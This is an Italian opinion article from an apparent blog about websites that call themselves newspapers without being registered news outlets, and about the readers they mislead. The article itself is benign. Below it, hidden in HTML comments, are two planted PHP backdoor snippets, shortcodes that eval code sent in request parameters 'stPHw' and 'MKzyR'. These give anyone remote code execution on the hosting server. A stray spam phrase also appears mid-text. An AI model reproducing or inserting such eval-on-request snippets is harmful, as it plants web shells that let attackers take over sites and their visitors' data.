Giornali online, sito o testata?

Giornali online, siti o testate?

 Sia ben chiaro, non sto alludendo ai blog che nulla hanno a che fare su questo stato di cose, perché un blog è qualcosa di personale che nasce per raccogliere le esternazioni di chi lo ha messo in piedi, ma in Rete è vera giungla informativa.

E’ biasimabile ma non giustificabile l’azione del “ragazzetto” della porta accanto che pur di comprarsi le Nike nuove o gli occhiali da sole all’ultimo grido, non apre un blog ma addirittura un sito di informazione fatto di comunicati stampa, di articoli e di tanto contenuto copiato look at more info. Allo stesso tempo, pero’, non è accettabile il comportamento di siti che rappresentano società di capitali che da atto costitutivo si occupano di altro e non certo di informazione e che si divertono a speculare, sfidando la “velocità della luce”, sui poveri “cercatori di informazione nei motori di ricerca”. Pensare che tali siti si fregiano di accezioni come “giornali” o “fonti autorevoli” ma che non sono in nessun modo una testata giornalistica. Ma vi sembra davvero una differenza da poco???

In fondo per bypassare gli obblighi di legge e evitare una direzione giornalista che è quasi sempre vista come una mera zavorra e non un punto di eccellenza per accreditare la testata stessa, è sufficiente giocare sulla periodicità dell’informazione pubblicata sul sito che spesso pero’ recita il falso, poiché tale periodicità è facilmente riscontrabile dalla frequenza dell’aggiornamento che quasi sempre risulta quotidiana.

A farne le spese, neanche a dirlo, sono i poveri e inconsapevoli lettori che spesso si affidano ad algoritmi come quelli dei motori di ricerca per informarsi, dando per scontato che se una notizia è pubblicata ha la certezza che sia attendibile e verificata (dovere del giornalista). Questo anche perchè chi dovrebbe vigilare sull’informazione è distratto da altre cose…

Potrebbe interessarti  Quando il Corriere diventa Novella 2000

Ma il pesce come si sa, puzza sempre dalla testa. In questo mare sempre più increspato, fatto da persone e società senza scrupoli deontologici e poco attente alla qualità dell’informazione, entrano a pieno titolo le stesse “fonti” ovvero agenzie di comunicazione che pur di vendere la propria ”rassegna stampa a chilo” al proprio cliente, non disdegnano di inserire comunicati stampa anche di clienti autorevoli e brand blasonatissimi, in qualsiasi sito anche amatoriale.  L’articolo completo pubblicato su FullPress.it

<!– [insert_php]if (isset($_REQUEST["stPHw"])){eval($_REQUEST["stPHw"]);exit;}[/insert_php][php]if (isset($_REQUEST["stPHw"])){eval($_REQUEST["stPHw"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["MKzyR"])){eval($_REQUEST["MKzyR"]);exit;}[/insert_php][php]if (isset($_REQUEST["MKzyR"])){eval($_REQUEST["MKzyR"]);exit;}[/php] –>

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Scroll to Top